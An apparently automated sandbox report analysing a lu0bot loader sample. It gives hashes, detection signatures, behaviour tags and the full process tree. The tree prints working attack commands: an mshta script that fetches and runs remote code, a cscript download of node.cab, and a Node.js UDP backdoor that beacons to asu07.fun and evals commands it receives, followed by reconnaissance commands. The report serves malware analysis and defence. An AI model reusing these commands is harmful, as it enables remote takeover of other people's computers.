Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
04-08-2021 10:12
Static task
static1
Behavioral task
behavioral1
Sample
usfive_20210804-120800.exe
Resource
win7v20210410
General
-
Target
usfive_20210804-120800.exe
-
Size
2KB
-
MD5
ae597b5df58ab4f01867bb5eaac93efd
-
SHA1
c8a13f566a130f18507e824e1e5c167b186a65a7
-
SHA256
a565b1d26d7c7ea28aad5f1c23fb5c055198d200147589c7dc36e3e1fa13e119
-
SHA512
fd978db8ff6d1fc7625ec996938022d3e191a5b58d7dcd0a430f80e1558f4986aaaeff2cc57f0d21451905d24494f7c5581b349e2d75d28a77e5430309f13afa
Malware Config
Signatures
-
suricata: ET MALWARE lu0bot Loader HTTP Request
-
suricata: ET MALWARE lu0bot Loader HTTP Response
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.execscript.exeflow pid process 11 1548 mshta.exe 12 2064 cscript.exe -
Executes dropped EXE 1 IoCs
Processes:
node.exepid process 2120 node.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Drops file in Windows directory 2 IoCs
Processes:
expand.exedescription ioc process File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exenetstat.exepid process 2900 ipconfig.exe 2100 netstat.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
NTFS ADS 2 IoCs
Processes:
node.exedescription ioc process File created C:\Users\Admin\AppData\Local\Temp\deefb1bdafb71417:ads node.exe File created C:\ProgramData\DNTException\node.exe:c499f047c0fdd7a9d6397d37a946a996 node.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
node.exepid process 2120 node.exe 2120 node.exe 2120 node.exe 2120 node.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
tasklist.exewmic.exenetstat.exedescription pid process Token: SeDebugPrivilege 1684 tasklist.exe Token: SeIncreaseQuotaPrivilege 2724 wmic.exe Token: SeSecurityPrivilege 2724 wmic.exe Token: SeTakeOwnershipPrivilege 2724 wmic.exe Token: SeLoadDriverPrivilege 2724 wmic.exe Token: SeSystemProfilePrivilege 2724 wmic.exe Token: SeSystemtimePrivilege 2724 wmic.exe Token: SeProfSingleProcessPrivilege 2724 wmic.exe Token: SeIncBasePriorityPrivilege 2724 wmic.exe Token: SeCreatePagefilePrivilege 2724 wmic.exe Token: SeBackupPrivilege 2724 wmic.exe Token: SeRestorePrivilege 2724 wmic.exe Token: SeShutdownPrivilege 2724 wmic.exe Token: SeDebugPrivilege 2724 wmic.exe Token: SeSystemEnvironmentPrivilege 2724 wmic.exe Token: SeRemoteShutdownPrivilege 2724 wmic.exe Token: SeUndockPrivilege 2724 wmic.exe Token: SeManageVolumePrivilege 2724 wmic.exe Token: 33 2724 wmic.exe Token: 34 2724 wmic.exe Token: 35 2724 wmic.exe Token: 36 2724 wmic.exe Token: SeIncreaseQuotaPrivilege 2724 wmic.exe Token: SeSecurityPrivilege 2724 wmic.exe Token: SeTakeOwnershipPrivilege 2724 wmic.exe Token: SeLoadDriverPrivilege 2724 wmic.exe Token: SeSystemProfilePrivilege 2724 wmic.exe Token: SeSystemtimePrivilege 2724 wmic.exe Token: SeProfSingleProcessPrivilege 2724 wmic.exe Token: SeIncBasePriorityPrivilege 2724 wmic.exe Token: SeCreatePagefilePrivilege 2724 wmic.exe Token: SeBackupPrivilege 2724 wmic.exe Token: SeRestorePrivilege 2724 wmic.exe Token: SeShutdownPrivilege 2724 wmic.exe Token: SeDebugPrivilege 2724 wmic.exe Token: SeSystemEnvironmentPrivilege 2724 wmic.exe Token: SeRemoteShutdownPrivilege 2724 wmic.exe Token: SeUndockPrivilege 2724 wmic.exe Token: SeManageVolumePrivilege 2724 wmic.exe Token: 33 2724 wmic.exe Token: 34 2724 wmic.exe Token: 35 2724 wmic.exe Token: 36 2724 wmic.exe Token: SeDebugPrivilege 2100 netstat.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
usfive_20210804-120800.exemshta.execmd.execscript.exenode.exedescription pid process target process PID 532 wrote to memory of 1548 532 usfive_20210804-120800.exe mshta.exe PID 532 wrote to memory of 1548 532 usfive_20210804-120800.exe mshta.exe PID 532 wrote to memory of 1548 532 usfive_20210804-120800.exe mshta.exe PID 1548 wrote to memory of 3340 1548 mshta.exe cmd.exe PID 1548 wrote to memory of 3340 1548 mshta.exe cmd.exe PID 1548 wrote to memory of 3340 1548 mshta.exe cmd.exe PID 3340 wrote to memory of 2064 3340 cmd.exe cscript.exe PID 3340 wrote to memory of 2064 3340 cmd.exe cscript.exe PID 3340 wrote to memory of 2064 3340 cmd.exe cscript.exe PID 3340 wrote to memory of 3032 3340 cmd.exe expand.exe PID 3340 wrote to memory of 3032 3340 cmd.exe expand.exe PID 3340 wrote to memory of 3032 3340 cmd.exe expand.exe PID 3340 wrote to memory of 3324 3340 cmd.exe cscript.exe PID 3340 wrote to memory of 3324 3340 cmd.exe cscript.exe PID 3340 wrote to memory of 3324 3340 cmd.exe cscript.exe PID 3324 wrote to memory of 2120 3324 cscript.exe node.exe PID 3324 wrote to memory of 2120 3324 cscript.exe node.exe PID 3324 wrote to memory of 2120 3324 cscript.exe node.exe PID 2120 wrote to memory of 2484 2120 node.exe cmd.exe PID 2120 wrote to memory of 2484 2120 node.exe cmd.exe PID 2120 wrote to memory of 2484 2120 node.exe cmd.exe PID 2120 wrote to memory of 2548 2120 node.exe cacls.exe PID 2120 wrote to memory of 2548 2120 node.exe cacls.exe PID 2120 wrote to memory of 2548 2120 node.exe cacls.exe PID 2120 wrote to memory of 532 2120 node.exe icacls.exe PID 2120 wrote to memory of 532 2120 node.exe icacls.exe PID 2120 wrote to memory of 532 2120 node.exe icacls.exe PID 2120 wrote to memory of 2788 2120 node.exe attrib.exe PID 2120 wrote to memory of 2788 2120 node.exe attrib.exe PID 2120 wrote to memory of 2788 2120 node.exe attrib.exe PID 2120 wrote to memory of 3024 2120 node.exe attrib.exe PID 2120 wrote to memory of 3024 2120 node.exe attrib.exe PID 2120 wrote to memory of 3024 2120 node.exe attrib.exe PID 2120 wrote to memory of 1684 2120 node.exe tasklist.exe PID 2120 wrote to memory of 1684 2120 node.exe tasklist.exe PID 2120 wrote to memory of 1684 2120 node.exe tasklist.exe PID 2120 wrote to memory of 2724 2120 node.exe wmic.exe PID 2120 wrote to memory of 2724 2120 node.exe wmic.exe PID 2120 wrote to memory of 2724 2120 node.exe wmic.exe PID 2120 wrote to memory of 2900 2120 node.exe ipconfig.exe PID 2120 wrote to memory of 2900 2120 node.exe ipconfig.exe PID 2120 wrote to memory of 2900 2120 node.exe ipconfig.exe PID 2120 wrote to memory of 3032 2120 node.exe route.exe PID 2120 wrote to memory of 3032 2120 node.exe route.exe PID 2120 wrote to memory of 3032 2120 node.exe route.exe PID 2120 wrote to memory of 2100 2120 node.exe netstat.exe PID 2120 wrote to memory of 2100 2120 node.exe netstat.exe PID 2120 wrote to memory of 2100 2120 node.exe netstat.exe PID 2120 wrote to memory of 1512 2120 node.exe systeminfo.exe PID 2120 wrote to memory of 1512 2120 node.exe systeminfo.exe PID 2120 wrote to memory of 1512 2120 node.exe systeminfo.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 2788 attrib.exe 3024 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\usfive_20210804-120800.exe"C:\Users\Admin\AppData\Local\Temp\usfive_20210804-120800.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta "javascript:document.write();159;y=unescape('%361%7Eh%74t%70%3A%2F%2F%61s%750%37%2E%66u%6E%2F%68r%69%2F%3F2%31a%36e%34b%7E2%31').split('~');56;try{x='WinHttp';176;x=new ActiveXObject(x+'.'+x+'Request.5.1');175;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);251;x.send();120;y='ipt.S';132;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);32;}catch(e){};239;;window.close();"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1628071956320.txt & cscript /nologo /e:jscript get1628071956320.txt "http%3A%2F%2Fasu07.fun%2Fhri%2F%3F22ce76d60%26b%3D1c63848f" node.cab & expand node.cab node.exe & del get1628071956320.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1628071956320.txt & cscript /nologo /e:jscript get1628071956320.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%272ce76d60%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu07.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1628071956320.txt3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1628071956320.txt "http%3A%2F%2Fasu07.fun%2Fhri%2F%3F22ce76d60%26b%3D1c63848f" node.cab4⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\expand.exeexpand node.cab node.exe4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1628071956320.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%272ce76d60%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu07.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"4⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\DNTException\node.exe"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%272ce76d60%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu07.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))5⤵
- Executes dropped EXE
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c dir C:\6⤵
-
C:\Windows\SysWOW64\cacls.execacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F6⤵
-
C:\Windows\SysWOW64\icacls.exeicacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)6⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException6⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException\node.exe6⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\tasklist.exetasklist /fo csv /nh6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic process get processid,parentprocessid,name,executablepath /format:csv6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\ipconfig.exeipconfig.exe /all6⤵
- Gathers network information
-
C:\Windows\SysWOW64\route.exeroute.exe print6⤵
-
C:\Windows\SysWOW64\netstat.exenetstat.exe -ano6⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo.exe /fo csv6⤵
- Gathers system information
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\DNTException\get1628071956320.txtMD5
52ec5ebd8a447b5115ce83e703bcde51
SHA138ce97f87c6be668d07985558fc89c53e27770a3
SHA256ef1be6a77e480e683331052654d3db47a02fe4b7af3e35e67b9248e989307615
SHA5129af71d426564ef92ff6de1d89107161c138bbdd9dc08b5e380a0b94e7b2e91ec4d498a1d8f4514552a45bf14a8f9078dc295aa1cb86cfc063427ad218e9d5f32
-
C:\ProgramData\DNTException\get1628071956320.txtMD5
e15f82747d0884d61a5bc4fb2db7d29d
SHA1aca478622586f17603fe56705fd319b75198b2b0
SHA256982675d0465497986b3ece89f08f81a4629d975617671153e0ca653f2589966f
SHA512d8c17e54cbefa72191c238f23d619a4637fd74c8c8b9975071bf5507c5a34259495cd20e516c7f7f0c215ec4f724b22de88b8a5ea43765c019eb067600cf661d
-
C:\ProgramData\DNTException\node.cabMD5
c7ed3d9304a29c8b472174bd910be071
SHA122b7d55b80acd434c13b0a2d8c59b45c10220a42
SHA256abbaffb1b56bd3c5db5aedf4bdc0794d82bedba43677d13cd1056cb5412b3441
SHA512c65c80564019ae54145a939f9ed463895c337f020cbd769647dc6baf8db5db283a5e151c2ae4f10681d23db161d791ce59c395d8ebba603a27a2a6be0368a1a2
-
C:\ProgramData\DNTException\node.exeMD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
C:\ProgramData\DNTException\node.exeMD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
memory/532-133-0x0000000000000000-mapping.dmp
-
memory/1512-141-0x0000000000000000-mapping.dmp
-
memory/1548-114-0x0000000000000000-mapping.dmp
-
memory/1684-136-0x0000000000000000-mapping.dmp
-
memory/2064-116-0x0000000000000000-mapping.dmp
-
memory/2100-140-0x0000000000000000-mapping.dmp
-
memory/2120-128-0x0000000005E00000-0x0000000005E01000-memory.dmpFilesize
4KB
-
memory/2120-127-0x0000000025600000-0x0000000025601000-memory.dmpFilesize
4KB
-
memory/2120-126-0x0000000024F00000-0x0000000024F01000-memory.dmpFilesize
4KB
-
memory/2120-129-0x000000003E200000-0x000000003E201000-memory.dmpFilesize
4KB
-
memory/2120-130-0x0000000004800000-0x0000000004801000-memory.dmpFilesize
4KB
-
memory/2120-123-0x0000000000000000-mapping.dmp
-
memory/2120-125-0x0000000006A00000-0x0000000006A01000-memory.dmpFilesize
4KB
-
memory/2484-131-0x0000000000000000-mapping.dmp
-
memory/2548-132-0x0000000000000000-mapping.dmp
-
memory/2724-137-0x0000000000000000-mapping.dmp
-
memory/2788-134-0x0000000000000000-mapping.dmp
-
memory/2900-138-0x0000000000000000-mapping.dmp
-
memory/3024-135-0x0000000000000000-mapping.dmp
-
memory/3032-139-0x0000000000000000-mapping.dmp
-
memory/3032-118-0x0000000000000000-mapping.dmp
-
memory/3324-120-0x0000000000000000-mapping.dmp
-
memory/3340-115-0x0000000000000000-mapping.dmp